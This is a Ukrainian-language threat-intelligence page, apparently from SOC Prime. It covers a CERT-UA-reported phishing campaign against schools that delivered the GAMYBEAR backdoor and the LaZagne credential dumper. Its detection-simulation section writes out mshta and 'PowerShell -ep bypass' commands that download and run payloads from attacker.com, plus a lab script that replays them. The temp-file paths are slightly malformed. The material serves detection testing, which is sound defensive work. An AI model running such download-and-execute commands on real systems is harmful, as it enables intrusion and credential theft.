SOC Prime Bias: Критичний

20 Nov 2025 13:35 UTC

Цілеспрямована кібер-атака на школу в східній Україні з використанням інструменту GAMYBEAR (CERT-UA#18329)

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
Цілеспрямована кібер-атака на школу в східній Україні з використанням інструменту GAMYBEAR (CERT-UA#18329)
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Кампанія зі збору облікових даних вразила школи та державні установи у Сумській області через фішинговий електронний лист зі вкладенням у форматі ZIP. Відкриття архіву викликало файл HTA через mshta утиліту, яка потім завантажила скрипти PowerShell для розгортання бекдору GAMYBEAR та дампера облікових даних LaZagne, встановила C2 на основі HTTP і ексфільтрацію файлів із цільових директорій.

Аналіз атаки

CERT-UA зв’язала початкове порушення з фішинговим повідомленням, надісланим 26 травня 2025 року з викраденого облікового запису Gmail, надавши деталі кампанії в сповіщенні CERT-UA#18329. Судова експертиза виявила багатоступінчастий ланцюг зараження: ZIP → HTA → update.js → PowerShell → GAMYBEAR у супроводі зловмисного ПЗ LaZagne, з підтримкою стійкості через запис у реєстрі Run та періодичні завантаження з зловмисних URL.

Захист

Забезпечте багатофакторну аутентифікацію для всіх облікових записів електронної пошти, блокуйте виконання HTA та ненадійних скриптів PowerShell, закрийте ключ реєстру Run та впровадьте білий список додатків. Постійно оновлюйте правила виявлення на кінцевих точках, щоб розпізнавати зазначені імена файлів, хеши та мережеві індикатори.

Відповідь

Негайно ізолюйте уражені кінцеві точки, скиньте скомпрометовані облікові дані Gmail, зберіть всі визначені ІОС та проведіть комплексну перевірку на наявність GAMYBEAR, LaZagne та супутніх артефактів. Повідомте CERT-UA про інцидент та розповсюдьте ІОС через відповідні канали обміну кіберзагрозами.

Потік Атаки

Симуляції

Виконання симуляції

Передумова: Перевірка телеметрії та базової лінії повинна бути успішно пройдена.

Обґрунтування: Цей розділ детально описує точне виконання техніки супротивника (TTP), розроблене для виклику правила виявлення. Команди та наратив мають безпосередньо відображати виявлені TTP та націлені на створення точної телеметрії, очікуваної логікою виявлення.

  • Опис атаки та команди:

    1. Етап 1 – Розгортання зловмисного HTA: Нападник розміщує evil.hta на скомпрометованому веб-сервері.

    2. Етап 2 – Виконання через mshta.exe: Використовуючи командний рядок Windows, нападник запускає mshta.exe http://attacker.com/evil.hta. Це створює подію створення процесу з mshta.exe у командному рядку, задовольняючи перший пункт правила.

    3. Етап 3 – Обхід PowerShell: Щоб виконати корисне навантаження, яке обходить політику виконання системи, нападник запускає PowerShell з прапором -ep bypass:

      PowerShell -ep bypass -Command "Invoke-WebRequest http://attacker.com/payload.ps1 -OutFile $env:TEMPp.ps1; & $env:TEMPp.ps1"

      Це генерує другу подію створення процесу, що містить точний рядок PowerShell -ep bypass, задовольняючи другий пункт.

  • Скрипт регресивного тестування: Наведений нижче PowerShell скрипт відтворює вищезгадані кроки в автоматизованій, повторюваній манері.

    # -------------------------------------------------
    # Регресивний тест – Виклик Sigma Rule для mshta та PowerShell -ep bypass
    # -------------------------------------------------
    
    # Змінні – налаштуйте для вашого лабораторного середовища
    $htaUrl   = "http://127.0.0.1/evil.hta"   # Повинен вказувати на досяжний файл HTA
    $psUrl    = "http://127.0.0.1/payload.ps1" # Простий PS-пейлоад (наприклад, `Write-Host "pwned"`)
    
    # 1. Виклик mshta.exe
    Write-Host "[*] Запуск mshta.exe з параметром $htaUrl"
    Start-Process -FilePath "mshta.exe" -ArgumentList $htaUrl -NoNewWindow
    
    # Коротка пауза для забезпечення реєстрації процесу
    Start-Sleep -Seconds 2
    
    # 2. Виклик PowerShell з обходом політики виконання
    $psCmd = "Invoke-WebRequest $psUrl -UseBasicParsing -OutFile $env:TEMPp.ps1; & $env:TEMPp.ps1"
    Write-Host "[*] Запуск PowerShell -ep bypass"
    Start-Process -FilePath "powershell.exe" -ArgumentList "-ep bypass -Command `"$psCmd`"" -NoNewWindow
    
    # Пауза для дозволу реєстрації 
    Start-Sleep -Seconds 5
    
    Write-Host "[+] Тест завершено. Перевірте ваш SIEM на наявність попереджень."
  • Команди очищення: Видаліть тимчасові файли та завершіть будь-які завислі процеси тестування.

    # Вилучення тимчасового пейлоаду
    Remove-Item -Path "$env:TEMPp.ps1" -ErrorAction SilentlyContinue
    
    # Додатково завершити процеси mshta або PowerShell, створені тестом
    Get-Process -Name mshta, powershell -ErrorAction SilentlyContinue | Where-Object { $_.Id -ne $PID } | Stop-Process -Force